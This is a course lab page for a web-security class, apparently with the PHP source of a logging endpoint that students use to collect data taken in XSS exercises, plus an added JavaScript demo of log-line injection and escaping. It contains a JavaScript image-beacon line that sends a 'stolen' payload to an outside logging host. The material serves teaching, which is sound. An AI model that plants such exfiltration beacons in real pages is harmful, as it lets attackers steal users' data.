You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2026-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
  <h1>Lab 4 Logging Script</h1>
  <p>
    You can use this server side script to extract data from client-side
    JavaScript. For example, clicking this client-side hyperlink will cause
    the server to log the payload:
  </p>
  <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
  <p>
    The random argument is ignored, but ensures that the browser bypasses its
    cache when downloading the image. We suggest that you use the random
    argument in your scripts as well. The ID argument will help you
    distinguish your log entries from those sent by other students; we
    suggest picking your MIT Athena username. Newlines are not allowed in
    <tt>javascript:</tt> links; if this bothers you, try
    <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
  </p>

  <h2>Test form</h2>
  <p>
    If you just want to try out the script, you can use this form. (For your
    actual attacks in lab 4, you'll probably want to use the JavaScript image
    technique shown above.)
  </p>
  <form method="GET" action="">
    <label for="id">ID:</label><br />
    <input name="id" placeholder="your-mit-username" size="40" />
    <i>(some identifier to locate your payload in the log)</i>
    <br />
    <br />
    <label for="payload">Payload:</label><br />
    <input name="payload" placeholder="some-string" size="40" />
    <i>(the information you stole)</i>
    <br />
    <input type="submit" value="Log" name="log_submit" />
  </form>

  <h2>Logged entries</h2>
  <p>
    Below are the most recent logged entries, so that you can check if your
    attack worked:
  </p>
  <pre class="tty"><?php
    $lines = file_get_contents("/tmp/6.566-2026-logger.txt");
    echo htmlspecialchars($lines);
  ?></pre>

  <h2>Source code</h2>
  <p>In case you are curious, here is the source code of this page.</p>
  <pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
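Added example, not part of the original page or the course's code: a JavaScript model of two protections in the source above, the CR/LF replacement before an entry is written and the HTML escaping when the log is displayed, next to a naive formatter that lacks them. The function names and the sample id, date and payload are constructed for illustration.

```javascript
// Added example: models how log.php treats id/payload before writing them.
// Function names are hypothetical; all sample inputs are constructed.
const MAX_LEN = 1000; // byte limit log.php applies to id and to payload

// Naive formatter: copies client-controlled text into a line-oriented log as-is.
function formatNaive(date, id, payload) {
  return `${date}: ${id}: ${payload}\n`;
}

// Hardened formatter: size limits, then CR/LF replaced with '.', as in log.php.
function formatHardened(date, id, payload) {
  if (!payload) throw new Error("Empty payload given");
  for (const field of [id, payload]) {
    if (Buffer.byteLength(field, "utf8") > MAX_LEN) {
      throw new Error("Field is larger than 1000 bytes");
    }
  }
  const flatten = (s) => s.replace(/[\r\n]/g, ".");
  return `${date}: ${flatten(id)}: ${flatten(payload)}\n`;
}

// What a reader of the log sees: one entry per line, attributed to an id.
function idsInLog(logText) {
  return logText
    .split("\n")
    .filter((line) => line.length > 0)
    .map((line) => {
      const m = /^(.+? \+0000): ([^:]*): (.*)$/.exec(line);
      return m ? m[2] : null;
    });
}

// Display-side escaping of the five HTML-significant characters, the job
// htmlspecialchars() does before log.php echoes the log into <pre>.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed input: a payload carrying a newline and a fake second entry.
const DATE = "Fri, 03 Apr 2026 07:00:00 +0000";
const forged = "x\nFri, 03 Apr 2026 00:00:00 +0000: other-student: fake";

console.log(idsInLog(formatNaive(DATE, "student-a", forged)));
console.log(idsInLog(formatHardened(DATE, "student-a", forged)));
console.log(escapeHtml('<b title="t">'));
```

With the naive formatter the single request shows up as two entries, one of them attributed to an id that never sent it; with the replacement applied it stays one entry under the sender's id.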